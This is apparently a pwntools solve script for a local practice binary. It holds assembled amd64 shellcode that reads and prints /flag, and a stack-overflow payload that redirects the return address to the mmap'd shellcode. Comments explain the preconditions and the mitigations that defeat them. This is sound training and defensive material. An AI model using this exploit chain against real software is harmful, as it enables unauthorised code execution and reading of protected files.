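from pwn import *

# Solve script for a local practice binary under /challenge.
#
# Two stages, as the script is written:
#   1. Send raw amd64 machine code; the target is expected to place it in an
#      mmap'd region (inferred from the challenge name -- confirm against
#      the binary).
#   2. Send an oversized line so the saved return address on the stack is
#      replaced with the address of that region.
#
# NOTE(review): the line structure was restored from a copy in which the
# whole file sat on one physical line; in that form everything after the
# import is swallowed by the first '#' comment and the assembly cannot be
# parsed one instruction per line.
#
# Defensive reading: the chain needs (a) an unbounded read into a stack
# buffer with nothing checked between the buffer and the return address
# (the payload is padding plus an address, so presumably no stack canary),
# and (b) a mapping that holds caller-supplied bytes, is executable, and
# sits at a predictable address. Bounds-checked input, a stack protector,
# W^X mappings, or a randomized mapping address would each break one step.

# Stage-1 payload: open("/flag", O_RDONLY), read up to 100 bytes onto the
# stack, write them to stdout, exit(0). The path is addressed RIP-relative,
# so the code does not depend on where it is mapped.
# NOTE(review): the result of open is handed straight to read with no error
# check; if the open fails nothing useful is printed.
shellcode = asm('''
    /* Open flag file */
    mov rax, 2              /* SYS_open */
    lea rdi, [rip+flag]     /* filename */
    xor rsi, rsi            /* O_RDONLY */
    syscall

    /* Read flag content */
    mov rdi, rax            /* fd */
    mov rax, 0              /* SYS_read */
    sub rsp, 100            /* buffer space */
    mov rsi, rsp            /* buffer */
    mov rdx, 100            /* count */
    syscall

    /* Write to stdout */
    mov rdx, rax            /* count */
    mov rax, 1              /* SYS_write */
    mov rdi, 1              /* stdout */
    mov rsi, rsp            /* buffer */
    syscall

    /* Exit cleanly */
    mov rax, 60             /* SYS_exit */
    xor rdi, rdi            /* status = 0 */
    syscall

flag:
    .string "/flag"  # Absolute path
''', arch='amd64')

p = process('/challenge/binary-exploitation-hijack-to-mmap-shellcode-w')

# Stage 1: hand over the machine code, then acknowledge the prompt.
p.send(shellcode)
p.recvuntil(b'Press enter to continue!')
p.sendline()

# From the stack dump I received:
# - Buffer starts at rsp+0x20
# - Return address is at 0x7fff539fd8c8
# - Buffer starts at 0x7fff539fd890
# - So offset is 0x38 bytes (0x8c8 - 0x890 = 0x38)
# The two absolute stack addresses come from a single run; only their
# difference (0x38) is used below.
payload = b'A' * 0x38       # Padding to return address
# Hard-coded: assumes the target maps the stage-1 bytes at this same address
# on every run -- TODO confirm against the binary's mmap call.
payload += p64(0x2a55b000)  # Address where shellcode is mapped

# Stage 2: overwrite the saved return address.
p.sendline(payload)

# The target's output may contain raw, non-UTF-8 bytes; decode leniently so a
# stray byte does not raise UnicodeDecodeError and hide the rest.
print(p.recvall().decode(errors='replace'))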